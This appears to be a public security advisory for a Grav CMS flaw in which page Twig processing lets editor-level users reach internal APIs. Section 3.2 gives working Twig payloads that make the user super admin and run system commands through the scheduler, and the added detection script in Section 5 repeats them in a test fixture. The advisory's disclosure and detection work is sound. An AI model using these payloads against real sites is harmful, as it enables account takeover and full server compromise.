Grav CMS vulnerability
A zero-day vulnerability in the Grav content management system.
CVE‑ID: CVE‑TBD
Published: 2025-07-27
Reported: 2025-04-18
Last Updated: 2025-07-27
Severity: CVSS v3.1 Base Score: 8.8 (vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Affected Versions: 1.7.0 through 1.7.48, and all prereleases 1.8.1 through 1.8.4
Fixed Version: None
1. Executive Summary
A user with admin panel access and permission to create or edit pages in Grav CMS can enable Twig processing for a page in its frontmatter or settings. Because the page body is then rendered by Twig with the `grav` object in scope and no sandbox enforced, the user can inject Twig expressions that call Grav's internal APIs: escalating their own account to admin or super admin, or running arbitrary system commands through the scheduler API. This yields both Privilege Escalation (PE) and Remote Code Execution (RCE) from an editor-level account.
2. Timeline
Date | Event | Days since initial report |
---|---|---|
2025‑04‑18 | Initial disclosure sent via email to maintainers. | 0 |
2025‑04‑21 | Added to upstream Security Advisory board. | 3 |
2025‑06‑03 | First follow‑up emailed—no reply. | 46 |
2025‑06‑20 | Comment posted on advisory—no reply. | 63 |
2025‑07‑19 | Last‑call email sent (1 week deadline). | 92 |
2025‑07‑27 | Public disclosure. | 100 |
3. Details & Proof-of-Concept
3.1 Details
Grav CMS renders page content through Twig when Twig processing is enabled for that page in the admin panel (`process: twig: true` in the page header). A user with publisher/editor privileges who can create or edit pages, and therefore enable Twig processing, can inject arbitrary Twig that executes in the context of the page render.
This exposes Grav's internal APIs to the page author, including:
- `grav.user.update()` and `grav.user.save()`, which escalate the current user to admin or super admin;
- `grav.scheduler.addCommand()`, `grav.scheduler.save()` and `grav.scheduler.run()`, which execute arbitrary system commands.
The Twig sandbox is not enforced in this context, so the template has full access to any backend PHP object and method in the `system/src/Grav/Common` directory.
3.2 PoC
Preconditions:
- You must have access to at least an editor-level user with permission to create/edit pages (`admin.pages` access).
- For Privilege Escalation, you also have to be logged in to the site frontend with the same user as in the admin panel.
Steps to reproduce Privilege Escalation:
- Log in to the non-admin site (default at `cms-url/login`).
- Log in to the admin panel, create or edit a page and set Twig processing to true (Advanced -> Process: Twig: true).
- Inject the following payload into the page content to escalate privileges:
```twig
{% set _ = grav.user.update({
    'access': {
        'admin': {
            'login': true,
            'super': true
        }
    }
}, {}) %}
{% set _ = grav.user.save() %}
```
- Visit the edited/created page URL. The logged-in user is now admin. (Note: for the change to show, you need to log out of the admin panel and log in again.)
Steps to reproduce Remote Code Execution:
- Log in to the admin panel, create or edit a page and set Twig processing to true (Advanced -> Process: Twig: true).
- Inject the following payload into the page content to execute commands:
```twig
{% set _ = grav.scheduler.addCommand('curl', ['http://localhost:8000']) %}
{% set _ = grav.scheduler.save() %}
{% set _ = grav.scheduler.run() %}
```
- Visit the page to trigger the execution. The system will issue a `curl` request to the given URL; any other binary and arguments can be substituted.
4. Impact
Scope: Remote Code Execution by any authenticated admin panel user who holds page create/edit rights (`admin.pages`).
Impact: Full system compromise, data exfiltration, pivot to internal networks.
CVSS v3.1 Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
5. Mitigation & Patch
Currently, there is no official patch for this issue.
As a temporary fix, I recommend turning off Twig processing for pages globally (`pages: process: twig: false` in `user/config/system.yaml`). Be aware that a page's own frontmatter `process: twig: true` overrides the global setting, so the global switch alone does not stop a user who can still edit page headers; restricting `admin.pages` to trusted users, and reviewing existing pages, the scheduler configuration and account files for the traces described above, is the more robust interim control.
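Until a fix ships, an administrator will want to hunt for the artefacts this technique leaves behind. The script below is an added example written for this page, not code from the advisory author or the Grav project. It assumes a standard Grav layout (pages under `user/pages/*.md` with a YAML frontmatter block, scheduler jobs saved to `user/config/scheduler.yaml` under `custom_jobs` with a `command:` key, and account files under `user/accounts/*.yaml` carrying `access: admin: super:`); those paths and keys are assumptions, as is the list of method names treated as suspicious, which is simply the set the advisory shows being abused. The fixture it scans is constructed inline.

```python
"""Hunt a Grav site tree for traces of the Twig injection described above.

Assumptions (not stated in the advisory): pages live under user/pages as
*.md files with a YAML frontmatter block; scheduler jobs are saved to
user/config/scheduler.yaml under `custom_jobs` with a `command:` key;
account files under user/accounts/*.yaml carry `access: admin: super:`.
"""
import re
import tempfile
from pathlib import Path

# Internal API calls the advisory shows being abused. An editor's page
# content has no legitimate reason to reference any of them.
SUSPICIOUS_CALLS = (
    "grav.user.update", "grav.user.save",
    "grav.scheduler.addCommand", "grav.scheduler.save", "grav.scheduler.run",
)
FRONTMATTER_RE = re.compile(r"\A---[ \t]*\n(.*?)\n---[ \t]*\n?(.*)\Z", re.S)


def twig_enabled(header: str) -> bool:
    """True if the page header sets process.twig to true (block or flow YAML style)."""
    if re.search(r"^\s*process:\s*\{[^}]*\btwig\s*:\s*true\b", header, re.M | re.I):
        return True
    lines = header.splitlines()
    for i, line in enumerate(lines):
        m = re.match(r"^(\s*)process:\s*$", line)
        if not m:
            continue
        indent = len(m.group(1))
        for sub in lines[i + 1:]:            # walk the nested block under process:
            if not sub.strip():
                continue
            if len(sub) - len(sub.lstrip()) <= indent:
                break                        # dedented: left the process: block
            if re.match(r"^\s*twig:\s*true\b", sub, re.I):
                return True
    return False


def scan_page(text: str):
    """Return the suspicious calls found in a Twig-enabled page body, else None."""
    m = FRONTMATTER_RE.match(text)
    if not m:
        return None
    header, body = m.group(1), m.group(2)
    hits = [c for c in SUSPICIOUS_CALLS if c in body]
    return hits if twig_enabled(header) and hits else None


def scheduler_commands(text: str):
    """List every command: value in scheduler.yaml so unexpected jobs stand out."""
    return re.findall(r"^\s+command:\s*['\"]?([^'\"\n]+)", text, re.M)


def is_super_admin(text: str) -> bool:
    """True if an account file grants access.admin.super."""
    return re.search(r"^\s+super:\s*true\b", text, re.M | re.I) is not None


def scan_site(root: Path) -> dict:
    """Collect injected pages, scheduler commands and super-admin accounts."""
    pages = {}
    for md in (root / "user" / "pages").rglob("*.md"):
        hits = scan_page(md.read_text())
        if hits:
            pages[str(md.relative_to(root))] = hits
    sched = root / "user" / "config" / "scheduler.yaml"
    jobs = scheduler_commands(sched.read_text()) if sched.exists() else []
    supers = sorted(a.stem for a in (root / "user" / "accounts").glob("*.yaml")
                    if is_super_admin(a.read_text()))
    return {"pages": pages, "jobs": jobs, "supers": supers}


def build_sample_site(root: Path) -> Path:
    """Constructed fixture: a benign page, a page carrying the PoC payloads,
    a scheduler.yaml with an injected job, and two accounts."""
    for d in ("user/pages/01.home", "user/pages/02.evil", "user/config", "user/accounts"):
        (root / d).mkdir(parents=True)
    (root / "user/pages/01.home/default.md").write_text(
        "---\ntitle: Home\nprocess:\n  markdown: true\n  twig: false\n---\n# Hello\n")
    (root / "user/pages/02.evil/default.md").write_text(
        "---\ntitle: Evil\nprocess:\n  markdown: true\n  twig: true\n---\n"
        "{% set _ = grav.user.update({'access': {'admin': {'login': true, 'super': true}}}, {}) %}\n"
        "{% set _ = grav.user.save() %}\n"
        "{% set _ = grav.scheduler.addCommand('curl', ['http://localhost:8000']) %}\n"
        "{% set _ = grav.scheduler.save() %}\n{% set _ = grav.scheduler.run() %}\n")
    (root / "user/config/scheduler.yaml").write_text(
        "status:\n  backups: enabled\ncustom_jobs:\n  abc123:\n    command: curl\n"
        "    args: 'http://localhost:8000'\n    at: '* * * * *'\n")
    (root / "user/accounts/admin.yaml").write_text(
        "email: admin@example.com\naccess:\n  admin:\n    login: true\n    super: true\n")
    (root / "user/accounts/editor.yaml").write_text(
        "email: editor@example.com\naccess:\n  admin:\n    login: true\n    pages: true\n")
    return root


def demo() -> dict:
    """Build the constructed fixture in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as d:
        return scan_site(build_sample_site(Path(d)))


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Point `scan_site()` at a real site root instead of the fixture; any page listed under `pages`, any `jobs` entry you did not create, and any name in `supers` beyond your known administrators is worth treating as an indicator of compromise rather than cleaning up silently.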
6. Disclosure & Credits
Discovered and reported by p1r0x.